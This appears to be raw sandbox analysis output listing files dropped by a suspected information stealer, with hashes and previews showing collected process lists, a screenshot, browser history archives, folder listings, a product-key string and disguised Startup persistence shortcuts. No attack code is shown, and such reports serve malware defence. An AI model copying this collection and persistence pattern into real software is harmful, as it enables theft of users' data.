                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):17264
                                                                                                                                                                                                                                Entropy (8bit):5.69544679328736
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:HzFXTdqBUEIctw2zqmTB9stgf9wBMwTmfJg1Wx1HJ2:HdTdqBUEI52mmYtE2MwTm6Wx1p2
                                                                                                                                                                                                                                MD5:29E1A048B32C8E36E6428FA8A51B16F3
                                                                                                                                                                                                                                SHA1:C1E0F9889350A3A5D0C98A670DBCB4DC43D0D07E
                                                                                                                                                                                                                                SHA-256:677FB402DA27C33F26575CD8FF127C631198593256B467263636A03213637611
                                                                                                                                                                                                                                SHA-512:D7B377293FFE09E6FF059C59C51945110EA48F3F6E45CE98535DEF76DDF98F0F36E1C284281140F103A4E281A208C763051757F08C0752C363D3B041E4CB8BBF
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NAME: svchost..PID: 2152..EXE: ..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: WmiPrvSE..PID: 5164..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: dllhost..PID: 6024..EXE: C:\Windows\system32\DllHost.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: fontdrvhost..PID: 784..EXE: ..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: svchost..PID: 1176..EXE: ..NAME: svchost..PID: 2564..EXE: ..NAME: csrss..PID: 408..EXE: ..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):29
                                                                                                                                                                                                                                Entropy (8bit):3.814371943179627
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:IEqdVoq:IEqn9
                                                                                                                                                                                                                                MD5:07891FA9AD66325DD8D52FD3E1D9589A
                                                                                                                                                                                                                                SHA1:781C0458F84526977DC075FF0338F19170AFBA75
                                                                                                                                                                                                                                SHA-256:6DFC01037FEE4B222086A6F1EDF201BF7952C5B6F9090F30DD30320972632005
                                                                                                                                                                                                                                SHA-512:E8D7F00221CC9E681133506B27428384A3F96F62EB6AB749032D861396B160427BEC354AAECF3B062541F88D78CC389922D520DC7E1B1119182102950E72165E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PJN2K-W4T8B-J6J38-PMMTG-MPDD4
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):84
                                                                                                                                                                                                                                Entropy (8bit):4.6630509827051725
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                                                                                                                                                                                MD5:58CD2334CFC77DB470202487D5034610
                                                                                                                                                                                                                                SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                                                                                                                                                                                SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                                                                                                                                                                                SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):14637
                                                                                                                                                                                                                                Entropy (8bit):5.642697713926756
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:48:DyCayCDyCQNyCdyCcyCgyCFyCIyC8yCLyCuyCAyCUyCJyCoyCJyzFMfNyCSyCYy9:xyzqTc5J8Ed
                                                                                                                                                                                                                                MD5:9516B94F40084A0D5C091AC96ADF9C1C
                                                                                                                                                                                                                                SHA1:67135EA254D25BF55DAC1A3F99C96634D9B989E1
                                                                                                                                                                                                                                SHA-256:9758EDB4922E3FDC5B30F4E78D00A76C70C426058587F90005FECAC67FFAFBCD
                                                                                                                                                                                                                                SHA-512:F865376C17B0B428D76A5886118ED47DB6042CC8A85EAFD7C856F5EDC63C54FD81E8BF261BF8C6B56F93CB9C8FBB70ED15869B0FB03E84DBC5A4D704FC63F8A2
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 2144..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6884..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6160..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Chrome..PID: 6648..EXE: C:\Program Files (x86)\WnbvwnyLEIpMIksLgGexpglTXwVvircFiDcjndWbYjZBEwZBEr\QhDWCkhNozKoaiqNEYjOpjCAnG.exe..NAME: QhDWCkhNozKoaiqNEYjOpjCAnG..TITLE: New Tab - Google Ch
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4336.tmp.Server.exe
                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):81599
                                                                                                                                                                                                                                Entropy (8bit):7.794743429152203
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:C3IPMZurfQ4pchCNj4Sqzd3bG/KkifU8iwWuCruN+iTeeoTJr4:eI0ZyI4pcgqzdr8XHXzqclr4
                                                                                                                                                                                                                                MD5:C2D0F6442AC70CF7172B54758F18CBC4
                                                                                                                                                                                                                                SHA1:5F4384CD128972F6F2153FDEB8A6F725424F6642
                                                                                                                                                                                                                                SHA-256:42DB0ADFCDE8CF707022F99638AE5936529C7ED030C3CBD6A7BD5C9C91E2F33D
                                                                                                                                                                                                                                SHA-512:B2038F0F537689FD10E3CF203AD779D59AB3F9E9A719C583C49071AD872822F29BC473F07AABC1783E957AC1ECD6304DA82608DEA720FB4390ADF7FE748C373E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.........;Yd@....1...m...g>....Vr....cFr....1mn..{}...D.q.........e..5.R....a..Y..z.8?.GZ...-5..JZ).J)h........;...zA...^.....^..g._k...v..gb..._.b.[............y..g.,.c..:...qtk..........Ek..E..s..Q@....-..Q.c>...6.:.uj*q.f.iJ..ba.]..#Z..6................j...>......_#.....D..7.....I..........J.j...Bt]..QEjb.QE....k;U......!%..3....Ft.......5.[...p.oo;~....l
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1
                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:V:V
                                                                                                                                                                                                                                MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                                                                                                                                                                                                SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                                                                                                                                                                                                SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                                                                                                                                                                                                SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:0
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):137173
                                                                                                                                                                                                                                Entropy (8bit):7.915199951332383
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:U2mjNgVmHKmfMMhQR63uGXg84CmnIIuhx53H/7CuzL:Nmj2VmHKMMMSR63uog8tmnIR5XzjL
                                                                                                                                                                                                                                MD5:0CCBC44138C15A1859F8B406A8D72ED2
                                                                                                                                                                                                                                SHA1:7086425AB0015C46E5668505FFAAF2A76A4F6BBE
                                                                                                                                                                                                                                SHA-256:A9839973262EF55650B5DD47F19FB8993EE19E57B3A6902956798D2EC4207020
                                                                                                                                                                                                                                SHA-512:4867A85B19CF7C3526479D61934E21C889237305DEEF2E41C0590D1CD579943B3829198324D6860C5CA2A37E1E6B36C8543C812904561ED721D13F004E2FE01C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:PK........OG.X................Browsers\Edge\PK........q;.XQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK........q;.Xc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK........p;.X..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK........q;.X1.#.>...5.......Directories\Desktop.txteR.n. .|.I..4i.@.....PI.vm.w.m.?..V..ycN...C....:.??E......8 ..&.J...0Bv....H+\%EW.6...8s$...a..&.7.....<...B...g.,$hw.ad..D..+4.n.QcM^'8I[4\.?.u.k.7,h....k....*..B.+o3...dEq...W..D"....+5.WZ.f.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):105
                                                                                                                                                                                                                                Entropy (8bit):3.8863455911790052
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
                                                                                                                                                                                                                                MD5:2E9D094DDA5CDC3CE6519F75943A4FF4
                                                                                                                                                                                                                                SHA1:5D989B4AC8B699781681FE75ED9EF98191A5096C
                                                                                                                                                                                                                                SHA-256:C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
                                                                                                                                                                                                                                SHA-512:D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):94
                                                                                                                                                                                                                                Entropy (8bit):4.886397362842801
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
                                                                                                                                                                                                                                MD5:61CDD7492189720D58F6C5C975D6DFBD
                                                                                                                                                                                                                                SHA1:6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
                                                                                                                                                                                                                                SHA-256:2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
                                                                                                                                                                                                                                SHA-512:20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1393
                                                                                                                                                                                                                                Entropy (8bit):5.241470443395582
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
                                                                                                                                                                                                                                MD5:7F24357FFA354F2471DED45552B897D7
                                                                                                                                                                                                                                SHA1:1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
                                                                                                                                                                                                                                SHA-256:573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
                                                                                                                                                                                                                                SHA-512:202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):821
                                                                                                                                                                                                                                Entropy (8bit):5.2651980330864605
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:EF3IgqkOTRfMnaD/lvsoYduOVdPXrvaI1w0+mwGD/mF3FYdOeeu:ECfbRfBrOuudP3ZrmB4Oeeu
                                                                                                                                                                                                                                MD5:8BB6C23828842E60AD5CED543BF93F9D
                                                                                                                                                                                                                                SHA1:FF35F3F5EBBFEDF9988E1CE74EEFFC16878FAFC6
                                                                                                                                                                                                                                SHA-256:1B720EAD77E6D146B534367355FFE2316046CB071A7DFBC5D41C6E1ED50D1B10
                                                                                                                                                                                                                                SHA-512:AE4BF3525C59F74077FB5041D30AA1AC5FACCA58C8A00B7882B43E3B0457A9C4757723E2F492DF4B9B8AE057710578DF2EFD9BF3183EACEE68A705B62695E5EE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Desktop\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...Excel.lnk...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...xj40xovMsm.exe...XZXHAVGRAG.docx..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):834
                                                                                                                                                                                                                                Entropy (8bit):5.30276653598512
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:oF3IgqkOTRfMnaD/lvsoYduOVhvaI1w0+mwGD/mF3FYdOeR:oCfbRfBrOuudZrmB4OeR
                                                                                                                                                                                                                                MD5:3E77FD5851164F7116CA1DE185B21926
                                                                                                                                                                                                                                SHA1:B03D5601F6E6DC15B54F82C854A49C0BCA45214C
                                                                                                                                                                                                                                SHA-256:F71D584001783610360FC7294A824FF60435453CD7304DD204474B505EB70413
                                                                                                                                                                                                                                SHA-512:5A4C0555321CD50086A0A14A57FDDE961E3A95E55944377FF3E9EAFEDE8007001CC842F290EA9B85DD551DC1911CF34E921A417A25CDB2C550BABD0796ED0269
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Documents\...BPMLNOBVSB\...DVWHKMNFNN\...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...ONBQCLYSPU\....HTAGVDFUIE.pdf....KZWFNRXYKI.mp3....LTKMYBSEYZ.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.xlsx....WUTJSCBCFX.png...UOOJJOZIRH\...VLZDGUKUTZ\....FENIVHOIKN.mp3....HTAGVDFUIE.xlsx....KZWFNRXYKI.jpg....NIKHQAIQAU.png....NWTVCDUMOB.pdf....VLZDGUKUTZ.docx...XZXHAVGRAG\....HTAGVDFUIE.mp3....KATAXZVCPS.png....ONBQCLYSPU.xlsx....UMMBDNEQBN.jpg....VLZDGUKUTZ.pdf....XZXHAVGRAG.docx...ZBEDCJPBEY\...ZTGJILHXQB\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):338
                                                                                                                                                                                                                                Entropy (8bit):5.285684426154722
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6:3tSLKJswhjzAhjHs1j0/eyPcMuhOLt7ydsd+kGDysmFEKTFYd/r53raj7IsNubSM:QLKJsqvaI1w/8wLmwGDysmFEKTFYdjxL
                                                                                                                                                                                                                                MD5:8309266C95CA0536FA7C7D24DD510A68
                                                                                                                                                                                                                                SHA1:1B5FEF428E41596A839B7C8C5113F351562C7F86
                                                                                                                                                                                                                                SHA-256:70FEC1166A36BC10FD82C09C5380E24DA6E673AD02CCC57110501684865360C8
                                                                                                                                                                                                                                SHA-512:0761522F3023B5E91636645F0CC2807B1DA8AB42D25036FD0259811F8D8CABDC6107AD3253690B377CD997849C031B46DAB14D494C5597E3D55905A2622D4215
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Downloads\...desktop.ini...FENIVHOIKN.mp3...HTAGVDFUIE.mp3...HTAGVDFUIE.pdf...HTAGVDFUIE.xlsx...KATAXZVCPS.png...KZWFNRXYKI.jpg...KZWFNRXYKI.mp3...LTKMYBSEYZ.jpg...NIKHQAIQAU.png...NWTVCDUMOB.pdf...ONBQCLYSPU.docx...ONBQCLYSPU.xlsx...UMMBDNEQBN.jpg...UMMBDNEQBN.xlsx...VLZDGUKUTZ.docx...VLZDGUKUTZ.pdf...WUTJSCBCFX.png...XZXHAVGRAG.docx..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):25
                                                                                                                                                                                                                                Entropy (8bit):4.023465189601646
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:1hiR8LKB:14R8LKB
                                                                                                                                                                                                                                MD5:966247EB3EE749E21597D73C4176BD52
                                                                                                                                                                                                                                SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                                                                                                                                                                                SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                                                                                                                                                                                SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:OneDrive\...desktop.ini..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):88
                                                                                                                                                                                                                                Entropy (8bit):4.450045114302317
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                                                                                                                                                                                MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                                                                                                                                                                                SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                                                                                                                                                                                SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                                                                                                                                                                                SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):180
                                                                                                                                                                                                                                Entropy (8bit):4.5224726418616354
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:jgBLKeUWCgovXAsHL4/ovXASt0dAgovXAgH+t4/ovXAg+LNL0ovXA+OcwKovn:j4LKdsovXAsr4/ovXA/d/ovXAgeIovXR
                                                                                                                                                                                                                                MD5:2BF23DFFD4049B0B64D28F7FC1A78C81
                                                                                                                                                                                                                                SHA1:36741B2AED9716DEB9E134102496A972E88101D2
                                                                                                                                                                                                                                SHA-256:579028C4D5F59005F70DE46A4BF93790145FC6EED73CF4EB12549D0004F08227
                                                                                                                                                                                                                                SHA-512:37E2B67F31946567FF2E31EB8E401E1C1A16EAC5C8BED0A097B5FF2653D18358CA019E052BD4758501F326B87352D91B5BB315F1E9DD1CCB4375829DCFEDEE4E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:Startup\...desktop.ini...psvhost.exe.lnk...Service_Adobe.exe.lnk...Service_com.adobe.dunamis.exe.lnk...Service_Microsoft.exe.lnk...Service_Mozilla.exe.lnk...Service_Skype.exe.lnk..
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):4669
